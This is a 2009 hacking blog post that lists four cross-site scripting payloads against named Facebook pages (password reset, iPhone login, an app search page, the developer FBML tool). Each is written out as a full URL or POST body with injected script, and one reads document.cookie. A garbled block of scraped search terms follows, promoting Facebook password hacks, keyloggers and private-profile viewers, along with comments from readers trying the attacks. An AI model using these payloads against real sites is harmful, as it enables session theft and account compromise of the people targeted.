More Facebook Xss Hacking 2009

Facebook's new homepage features a login form ...
Image via Wikipedia

If I have mentioned some security flaw that Facebook ever faced , like how to view facebook private profile pictures , some another facebook security flaws just have been discovered during the late 2008 until January 2009. And I’m pretty sure there will be more facebook xss hacking in 2009 . Some major facebook xss vulnerabilities has been published on Xssed.com (the most well-known website for xss news). And of course , you’re very allowed to leave this post if you still think Xss is not dangerous at all :) . Some critical Facebook Xss flaws can infect million facebook members with malware. And it’s not impossible for a new facebook xss worm to be developed under these circumstances.

The first Facebook xss vulnerability was occured on facebook reset password page :
XSS:
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Mirror : http://www.xssed.com/mirror/55951/

The 2nd : (with POST)
https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F

POST:

email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

The 3rd :
http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E

The 4th : (with POST)
http://developers.facebook.com/tools.php?fbml

POST:

profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=

Recenly search

Incoming search terms for the article:

facebook xssxss facebookxss on facebookfacebook Xss hackFaceBook Private Profiles and Pictures Viewer Hack Tool 2 0a rarfacebook xxsfacebook apps xsshack facebook dengan xssThe SHOCKING Hidden Message In The Google Logo! You will not believe this!!hack facebook xsscross site scripting and facebook hacking>

xss by p3lo

&fbml=">profile=1299125444&position=wide&api_key='">>

xss by p3lo

&fbml=
how to xss on facebookhow to veiw private facebook pictureshow to hack with xxs">">http://www facebook com/reset php?locale=en_GB">">: FaceBook Private Profiles and Pictures Viewer Hack Tool 2 0a rarShocking Disgusting Hidden Message in Toy Story 3shocking truth google logoSSTIC 09 facebook xxswww facebook com/reset php?locale=it-ITxss and facebookxss in facebookhacking facebook using xsshackear facebook via xss? facebook(www facebook com)[XSS]Facebook !cat physics level 43dacebookdacebook xssdanger dork hackingdisgusting hidden toyfaceboo xssfacebook connect xssfacebook cross site scriptingfacebook login xss hackforce cross-site script facebookhack facebook passwordHack Tool 2 0a rarxxs facebook cookie,  
Popular Today naruto shippuden 170 videologcat physics walkthroughnaruto shippuden 168 videologfacebook spybacktrack 3shy enginevtunnelBackTrack tutorialbacktrack 3 tutorialfacebook photo viewerSee The Shocking Hidden Message In The Google Logo that GOOGLE Does NOT Want You To Know About!how to view private myspace picturesmy empire hackview private myspace picturesSHOCKING: RUDE HIDDEN MESSAGE in Toy Story 3!facebook keyloggerHIDDEN MESSAGE IN GOOGLE LOGOTerri Moulton Hormanrapidleechbrute force facebook,   Computer Security Stuff on eBay!
Electronics stuffs on ebay

8 Responses to “More Facebook Xss Hacking 2009”

  1. I downloaded mozilla firefox and tried entering the private Id as instructed but It keeps saying that I have an invalid Id?
    Help!!

  2. One more reason to use a mac ;)

  3. uhm, you have to run exe, you retards. It wouldn?t matter what platform you were using.

  4. ok, so i think the big question is? how do we fix this?!

  5. em.. you can call me for fix it.

    am can help for development of facebook

  6. I actually think hack 2 and 4 have been fixed.

  7. i tried all of them.. so far doesnt work.. =(

  8. Want 2 veiw his blocked profile on facebook

Leave a Reply